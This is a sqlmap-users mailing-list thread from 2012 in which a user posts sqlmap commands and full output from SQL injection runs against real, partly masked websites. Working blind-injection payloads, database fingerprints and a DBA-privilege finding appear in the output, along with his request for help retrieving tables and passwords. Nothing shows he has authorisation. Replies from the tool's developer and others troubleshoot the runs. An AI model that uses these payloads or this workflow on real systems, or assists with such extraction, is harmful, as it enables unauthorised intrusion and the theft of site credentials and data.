Hi Stampar,
Thanks for your email. I tried again with payload hidJumpId=54' OR '54'%3D'54' AND 6149=6149 AND 'izAQ'='izAQ&JumpButton=Go&JumpPage=22 but the result is the same. Maybe the server filters out the data.
Thank you all the same.
bob
But why have you put that OR 54=54 inside post data? It's fascinating that no matter what protection mechanism we put inside sqlmap against users themselves, they'll find a way to skip the nag message and report a bug of some kind.
Could you please retry without that and use --flush-session?
Kind regards
Hi Stampar,
Thanks for your email. I fixed the last problem with your direction, but another problem has come up. I have found the injection point, but can't retrieve data. Details as follows:
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://www.xxxx/F/01/product/Products.asp" --data "hidJumpId=54%27%20OR%20%2754%27%3D%2754&JumpButton=Go&JumpPage=22" --param-del="&" --hex -a
sqlmap/1.0-dev-a40d7a5 - automatic SQL injection and database takeover tool
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 13:53:13
[13:53:13] [INFO] resuming back-end DBMS 'mysql'
[13:53:13] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: hidJumpId
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: hidJumpId=54' OR '54'%3D'54' AND 6149=6149 AND 'izAQ'='izAQ&JumpButton=Go&JumpPage=22
---
[13:53:18] [INFO] the back-end DBMS is MySQL
[13:53:18] [INFO] fetching banner
[13:53:18] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[13:53:18] [INFO] retrieved:
[13:53:18] [INFO] heuristics detected web page charset 'ascii'
[13:53:18] [INFO] retrieved:
web server operating system: Windows 2000
web application technology: ASP, Microsoft IIS 5.0
back-end DBMS: MySQL 5
[13:53:18] [INFO] fetching banner
[13:53:19] [INFO] retrieved:
[13:53:19] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' and/or switch '--hex'
banner: None
[13:53:19] [INFO] fetching current user
[13:53:20] [INFO] retrieved:
current user: None
[13:53:20] [INFO] fetching current database
[13:53:21] [INFO] retrieved:
current database: None
[13:53:21] [INFO] fetching server hostname
[13:53:22] [INFO] retrieved:
hostname: None
[13:53:22] [INFO] testing if current user is DBA
[13:53:22] [INFO] fetching current user
[13:53:22] [INFO] retrieved:
current user is DBA: True
[13:53:23] [INFO] fetching database users
[13:53:23] [INFO] fetching number of database users
[13:53:24] [INFO] retrieved:
[13:53:24] [CRITICAL] unable to retrieve the number of database users
Best regards
bob
------------------ Original Message ------------------
From: "Miroslav Stampar"<miroslav.stam...@gmail.com>;
Sent: Thursday, November 15, 2012, 2:26 PM
To: "Bob"<stock.l...@qq.com>;
Subject: Re: [sqlmap-users] Reply: sqlmap y/N can 't workable
Hi.
You are running sqlmap as a background console process. You can't expect such a process to be able to properly accept the console input you give. This is not an sqlmap issue but yours.
If you want to run more instances of sqlmap at the same time either open multiple terminals or use some kind of console multiplexer (e.g. screen).
Kind regards,
Miroslav Stampar
On Nov 15, 2012 6:53 AM, "Bob" <stock.l...@qq.com> wrote:
Hi Iago,
The sqlmap error details are as follows:
[13:32:02] [INFO] testing connection to the target url
[13:32:06] [INFO] testing if the url is stable, wait a few seconds
[13:32:11] [INFO] url is stable
[13:32:11] [INFO] testing if POST parameter 'hidJumpId' is dynamic
[13:32:12] [INFO] confirming that POST parameter 'hidJumpId' is dynamic
[13:32:13] [INFO] POST parameter 'hidJumpId' is dynamic
[13:32:14] [WARNING] reflective value(s) found and filtering out
[13:32:14] [WARNING] heuristic test shows that POST parameter 'hidJumpId' might not be injectable
[13:32:14] [INFO] testing for SQL injection on POST parameter 'hidJumpId'
[13:32:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:32:49] [CRITICAL] connection timed out to the target url or proxy. sqlmap is going to retry the request
[13:33:04] [INFO] POST parameter 'hidJumpId' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[13:33:04] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[13:33:34] [CRITICAL] connection timed out to the target url or proxy. sqlmap is going to retry the request
[13:33:36] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[13:33:37] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[13:33:37] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[13:33:38] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[13:33:38] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[13:33:39] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[13:33:39] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[13:33:40] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[13:33:40] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[13:33:41] [INFO] testing 'Oracle AND time-based blind'
[13:33:42] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[13:33:42] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found
[13:33:55] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[13:33:55] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[13:34:08] [INFO] checking if the injection point on POST parameter 'hidJumpId' is a false positive
[13:34:12] [INFO] heuristics detected web page charset 'ascii'
POST parameter 'hidJumpId' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
N: command not found
[4]+ Stopped ./sqlmap.py -u "http://XXXp" --data "hidJumpId=54%27%20OR%20%2754%27%3D%2754&JumpButton=Go&JumpPage=22" --param-del=
[4]+ Stopped ./sqlmap.py -u "http://XXX" --data "hidJumpId=54%27%20OR%20%2754%27%3D%2754&JumpButton=Go&JumpPage=22" --param-del=
------------------ Original Message ------------------
From: "Iago Sousa"<146050...@gmail.com>;
Sent: Sunday, June 24, 2012, 12:33 PM
To: "Bob"<stock.l...@qq.com>;
Cc: "sqlmap-users"<sqlmap-users@lists.sourceforge.net>;
Subject: Re: [sqlmap-users] sqlmap always tell Connection timed out to the target url
I think that the site is blocking your ip address.
On Jun 23, 2012 11:09 PM, "Bob" <stock.l...@qq.com> wrote:
Hi all,
I am using sqlmap to retrieve a database.
current-user and current-db work.
Retrieving tables, passwords, etc. results in a timeout response.
Could you tell me what the problem is? How can I retrieve tables and passwords?
Thanks
bob
[09:56:07] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: c_sn
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: c_sn=2' AND 8126=8126 AND 'Cqlm'='Cqlm
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: c_sn=2' AND SLEEP(5) AND 'eKVl'='eKVl
---
[09:56:08] [INFO] testing MySQL
[09:56:08] [INFO] confirming MySQL
[09:56:08] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL >= 5.0.0
[09:56:08] [INFO] fetching current user
[09:56:08] [INFO] resumed: keyway_db@localhost
current user: 'keyway_db@localhost'
[09:56:08] [INFO] fetching database users privileges
[09:56:08] [INFO] fetching database users
[09:56:08] [INFO] fetching number of database users
[09:56:08] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[09:56:08] [INFO] retrieved:
[09:57:09] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
[09:58:10] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
[09:59:11] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
[10:00:12] [CRITICAL] connection timed out to the target url or proxy
[*] shutting down at 10:00:12
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users